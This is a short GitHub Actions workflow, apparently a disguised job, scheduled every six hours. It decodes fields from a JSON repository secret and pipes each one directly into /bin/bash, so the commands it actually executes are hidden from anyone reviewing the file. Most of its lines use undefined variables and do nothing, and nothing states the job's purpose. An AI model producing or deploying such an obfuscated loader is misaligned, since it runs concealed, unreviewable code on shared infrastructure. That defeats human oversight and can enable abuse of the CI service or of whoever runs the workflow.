name: ruanxiaoer19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '17 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ruanxiaoer19871010
        env:
          a0062: ${{ secrets.a0062 }}
        run: |
          echo $a0062 | jq -r .paxr86 | /bin/bash
          echo $xdptt35 | jq -r .mv96 | /bin/bash
          echo $cp239 | jq -r .dec49386 | /bin/bash
          echo $lstt95 | jq -r .vu8335 | /bin/bash
          echo $hzopp3924 | jq -r .nghm9010 | /bin/bash

